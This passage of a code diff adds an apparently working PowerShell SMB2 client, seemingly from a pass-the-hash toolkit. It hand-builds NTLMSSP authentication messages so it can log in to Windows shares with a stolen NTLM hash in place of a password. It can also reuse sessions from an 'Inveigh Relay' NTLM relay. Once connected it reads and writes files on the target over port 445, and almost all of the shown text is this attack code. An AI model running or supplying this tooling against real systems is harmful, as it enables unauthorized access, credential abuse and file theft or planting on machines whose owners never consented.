+ $packet_SMB2ReadRequest.Add("Length",$packet_length_bytes)
+ $packet_SMB2ReadRequest.Add("Offset",$packet_offset_bytes)
+ $packet_SMB2ReadRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+}
+
+function New-PacketSMB2WriteRequest
+{
+ param ([Int]$packet_length,[Int64]$packet_offset,[Byte[]]$packet_file_ID,[Byte[]]$packet_buffer)
+
+ [Byte[]]$packet_length_bytes = [System.BitConverter]::GetBytes($packet_length)
+ [Byte[]]$packet_offset_bytes = [System.BitConverter]::GetBytes($packet_offset)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("Length",$packet_length_bytes)
+ $packet_SMB2WriteRequest.Add("Offset",$packet_offset_bytes)
+ $packet_SMB2WriteRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Buffer",$packet_buffer)
+
+ return $packet_SMB2WriteRequest
+}
+
+function New-PacketSMB2CloseRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+}
+
+function New-PacketSMB2TreeDisconnectRequest
+{
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+}
+
+function New-PacketSMB2SessionLogoffRequest
+{
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+}
+
+#NTLM
+
+function New-PacketNTLMSSPNegotiate
+{
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $packet_NTLMSSPNegotiate.Add("InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+}
+
+function New-PacketNTLMSSPAuth
+{
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+}
+
+function DataLength2
+{
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+
+ return $string_length
+}
+
+if($Modify -and $Action -eq 'Put' -and $Source -isnot [Byte[]])
+{
+ $output_message = "[-] Source must be a byte array when using -Modify"
+ $startup_error = $true
+}
+elseif((!$Modify -and $Source -isnot [String]) -or ($Modify -and $Action -ne 'Put' -and $Source -isnot [String]))
+{
+ $output_message = "[-] Source must be a string"
+ $startup_error = $true
+}
+elseif($Source -is [String])
+{
+ $source = $Source.Replace('.\','')
+}
+
+[String]$session_string = $session
+
+if($session_string -and !$Inveigh -or !$inveigh.session_socket_table[$session])
+{
+ Write-Output "[-] Inveigh Relay session not found"
+ $startup_error = $true
+}
+elseif($session_string -and !$inveigh.session_socket_table[$session].Connected)
+{
+ Write-Output "[-] Inveigh Relay session not connected"
+ $startup_error = $true
+}
+
+$destination = $Destination.Replace('.\','')
+
+if($hash -like "*:*")
+{
+ $hash = $hash.SubString(($hash.IndexOf(":") + 1),32)
+}
+
+if($Domain)
+{
+ $output_username = $Domain + "\" + $Username
+}
+else
+{
+ $output_username = $Username
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+#[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+[Byte[]]$process_ID_bytes = 0x00,0x00,0x00,0x00
+
+if(!$session_string_string)
+{
+ $SMB_client = New-Object System.Net.Sockets.TCPClient
+ $SMB_client.Client.ReceiveTimeout = 30000
+}
+
+$action_step = 0
+
+if($Action -ne 'Put')
+{
+ $source = $source.Replace('\\','')
+ $source_array = $source.Split('\')
+ $target = $source_array[0]
+ $share = $source_array[1]
+ $source_subdirectory_array = $source.ToCharArray()
+ [Array]::Reverse($source_subdirectory_array)
+ $source_file = -join($source_subdirectory_array)
+ $source_file = $source_file.SubString(0,$source_file.IndexOf('\'))
+ $source_file_array = $source_file.ToCharArray()
+ [Array]::Reverse($source_file_array)
+ $source_file = -join($source_file_array)
+ $target_share = "\\$target\$share"
+}
+
+switch($Action)
+{
+
+ 'Get'
+ {
+
+ if(!$Modify)
+ {
+
+ if($destination -and $destination -like '*\*')
+ {
+ $destination_file_array = $destination.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ $destination_file = $destination_file.SubString(0,$destination_file.IndexOf('\'))
+ $destination_file_array = $destination_file.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ $destination_path = $destination
+ }
+ elseif($destination)
+ {
+
+ if(Test-Path (Join-Path $PWD $destination))
+ {
+ $output_message = "[-] Destination file already exists"
+ $startup_error = $true
+ }
+ else
+ {
+ $destination_path = Join-Path $PWD $destination
+ }
+
+ }
+ else
+ {
+
+ if(Test-Path (Join-Path $PWD $source_file))
+ {
+ $output_message = "[-] Destination file already exists"
+ $startup_error = $true
+ }
+ else
+ {
+ $destination_path = Join-Path $PWD $source_file
+ }
+
+ }
+
+ }
+ else
+ {
+ $file_memory = New-Object System.Collections.ArrayList
+ }
+
+ }
+
+ 'Put'
+ {
+
+ if(!$Modify)
+ {
+
+ if($source -notlike '*\*')
+ {
+ $source = Join-Path $PWD $source
+ }
+
+ if(Test-Path $source)
+ {
+ [Int64]$source_file_size = (Get-Item $source).Length
+ $source_file = $source
+
+ if($source_file_size -gt 65536)
+ {
+ $source_file_size_quotient = [Math]::Truncate($source_file_size / 65536)
+ $source_file_size_remainder = $source_file_size % 65536
+ $source_file_buffer_size = 65536
+ }
+ else
+ {
+ $source_file_buffer_size = $source_file_size
+ }
+
+ $source_file_properties = Get-ItemProperty -path $source_file
+ $source_file_creation_time = $source_file_properties.CreationTime.ToFileTime()
+ $source_file_creation_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_creation_time))
+ $source_file_creation_time = $source_file_creation_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $source_file_last_access_time = $source_file_properties.LastAccessTime.ToFileTime()
+ $source_file_last_access_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_last_access_time))
+ $source_file_last_access_time = $source_file_last_access_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $source_file_last_write_time = $source_file_properties.LastWriteTime.ToFileTime()
+ $source_file_last_write_time = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($source_file_last_write_time))
+ $source_file_last_write_time = $source_file_last_write_time.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $source_file_last_change_time = $source_file_last_write_time
+ $source_file_buffer = new-object byte[] $source_file_buffer_size
+ $source_file_stream = new-object IO.FileStream($source_file,[System.IO.FileMode]::Open)
+ $source_file_binary_reader = new-object IO.BinaryReader($source_file_stream)
+ }
+ else
+ {
+ $output_message = "[-] File not found"
+ $startup_error = $true
+ }
+
+ }
+ else
+ {
+
+ [Int64]$source_file_size = $Source.Count
+
+ if($source_file_size -gt 65536)
+ {
+ $source_file_size_quotient = [Math]::Truncate($source_file_size / 65536)
+ $source_file_size_remainder = $source_file_size % 65536
+ $source_file_buffer_size = 65536
+ }
+ else
+ {
+ $source_file_buffer_size = $source_file_size
+ }
+
+ }
+
+ $destination = $destination.Replace('\\','')
+ $destination_array = $destination.Split('\')
+ $target = $destination_array[0]
+ $share = $destination_array[1]
+ $destination_file_array = $destination.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ $destination_file = $destination_file.SubString(0,$destination_file.IndexOf('\'))
+ $destination_file_array = $destination_file.ToCharArray()
+ [Array]::Reverse($destination_file_array)
+ $destination_file = -join($destination_file_array)
+ }
+
+}
+
+if($Action -ne 'Put')
+{
+
+ if($source_array.Count -gt 2)
+ {
+ $share_subdirectory = $source.Substring($target.Length + $share.Length + 2)
+ }
+
+}
+else
+{
+
+ if($destination_array.Count -gt 2)
+ {
+ $share_subdirectory = $destination.Substring($target.Length + $share.Length + 2)
+ }
+
+}
+
+if($share_subdirectory -and $share_subdirectory.EndsWith('\'))
+{
+ $share_subdirectory = $share_subdirectory.Substring(0,$share_subdirectory.Length - 1)
+}
+
+if(!$startup_error -and !$session_string)
+{
+
+ try
+ {
+ $SMB_client.Connect($target,"445")
+ }
+ catch
+ {
+ $output_message = "[-] $target did not respond"
+ }
+
+}
+
+if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table[$session].Connected))
+{
+
+ $SMB_client_receive = New-Object System.Byte[] 81920
+
+ if(!$session_string)
+ {
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_client_stage = 'NegotiateSMB'
+
+ while($SMB_client_stage -ne 'exit')
+ {
+
+ switch($SMB_client_stage)
+ {
+
+ 'NegotiateSMB'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes[0,1] 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_client_stage = 'exit'
+ $login_successful = $false
+ $output_message = "[-] SMB1 is not supported"
+ }
+ else
+ {
+ $SMB_version = 'SMB2'
+ $SMB_client_stage = 'NegotiateSMB2'
+
+ if([System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03')
+ {
+ Write-Verbose "[!] SMB signing is enabled"
+ $SMB_signing = $true
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0
+ }
+ else
+ {
+ $SMB_signing = $false
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x05,0x80,0x08,0xa0
+ }
+
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
+ 'NTLMSSPNegotiate'
+ {
+ $SMB2_message_ID ++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ }
+
+ if($SMB_version -eq 'SMB2')
+ {
+ $SMB_NTLMSSP = [System.BitConverter]::ToString($SMB_client_receive)
+ $SMB_NTLMSSP = $SMB_NTLMSSP -replace "-",""
+ $SMB_NTLMSSP_index = $SMB_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_NTLMSSP_bytes_index = $SMB_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 12) $SMB_client_receive
+ $SMB_target_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 40) $SMB_client_receive
+ $SMB_session_ID = $SMB_client_receive[44..51]
+ $SMB_NTLM_challenge = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 24)..($SMB_NTLMSSP_bytes_index + 31)]
+ $SMB_target_details = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_target_time_bytes = $SMB_target_details[($SMB_target_details.Length - 12)..($SMB_target_details.Length - 5)]
+ $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
+ $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $auth_hostname = (Get-ChildItem -path env:computername).Value
+ $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname)
+ $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($Domain)
+ $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username)
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)
+ $auth_username_length = $auth_username_length[0,1]
+ $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)
+ $auth_hostname_length = $auth_hostname_length[0,1]
+ $auth_domain_offset = 0x40,0x00,0x00,0x00
+ $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64)
+ $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64)
+ $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64)
+ $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88)
+ $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5
+ $HMAC_MD5.key = $NTLM_hash_bytes
+ $username_and_target = $username.ToUpper()
+ $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target)
+ $username_and_target_bytes += $auth_domain_bytes
+ $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
+ $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ $security_blob_bytes = 0x01,0x01,0x00,0x00,
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_time_bytes +
+ $client_challenge_bytes +
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_details +
+ 0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00
+
+ $server_challenge_and_security_blob_bytes = $SMB_NTLM_challenge + $security_blob_bytes
+ $HMAC_MD5.key = $NTLMv2_hash
+ $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes)
+
+ if($SMB_signing)
+ {
+ $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response)
+ $session_key = $session_base_key
+ $HMAC_SHA256 = New-Object System.Security.Cryptography.HMACSHA256
+ $HMAC_SHA256.key = $session_key
+ }
+
+ $NTLMv2_response = $NTLMv2_response + $security_blob_bytes
+ $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)
+ $NTLMv2_response_length = $NTLMv2_response_length[0,1]
+ $SMB_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88)
+
+ $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,
+ 0x03,0x00,0x00,0x00,
+ 0x18,0x00,
+ 0x18,0x00 +
+ $auth_LM_offset +
+ $NTLMv2_response_length +
+ $NTLMv2_response_length +
+ $auth_NTLM_offset +
+ $auth_domain_length +
+ $auth_domain_length +
+ $auth_domain_offset +
+ $auth_username_length +
+ $auth_username_length +
+ $auth_username_offset +
+ $auth_hostname_length +
+ $auth_hostname_length +
+ $auth_hostname_offset +
+ $SMB_session_key_length +
+ $SMB_session_key_length +
+ $SMB_session_key_offset +
+ $SMB_negotiate_flags +
+ $auth_domain_bytes +
+ $auth_username_bytes +
+ $auth_hostname_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $NTLMv2_response
+
+ $SMB2_message_ID ++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00')
+ {
+ Write-Verbose "[+] $output_username successfully authenticated on $target"
+ $login_successful = $true
+ }
+ else
+ {
+ $output_message = "[-] $output_username failed to authenticate on $target"
+ $login_successful = $false
+ }
+
+ }
+
+ }
+
+ try
+ {
+
+ if($login_successful -or $session_string)
+ {
+
+ if($session_string)
+ {
+
+ if($session_string -and $inveigh.session_lock_table[$session] -eq 'locked')
+ {
+ Write-Output "[*] Pausing due to Inveigh Relay session lock"
+ Start-Sleep -s 2
+ }
+
+ $inveigh.session_lock_table[$session] = 'locked'
+ $SMB_client = $inveigh.session_socket_table[$session]
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_session_ID = $inveigh.session_table[$session]
+ $SMB2_message_ID = $inveigh.session_message_ID_table[$session]
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ }
+
+ $SMB_path = "\\" + $Target + "\IPC$"
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ $directory_list = New-Object System.Collections.ArrayList
+ $SMB_client_stage = 'TreeConnect'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch($SMB_client_stage)
+ {
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+ catch
+ {
+ Write-Output "[-] Session connection is closed"
+ $SMB_client_stage = 'Exit'
+ }
+
+ if($SMB_client_stage -ne 'Exit')
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '00-00-00-00')
+ {
+ $error_code = [System.BitConverter]::ToString($SMB_client_receive[12..15])
+
+ switch($error_code)
+ {
+
+ 'cc-00-00-c0'
+ {
+ $output_message = "[-] Share not found"
+ $SMB_client_stage = 'Exit'
+ }
+
+ '22-00-00-c0'
+ {
+ $output_message = "[-] Access denied"
+ $SMB_client_stage = 'Exit'
+ }
+
+ default
+ {
+ $error_code = $error_code -replace "-",""
+ $output_message = "[-] Tree connect error code 0x$error_code"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
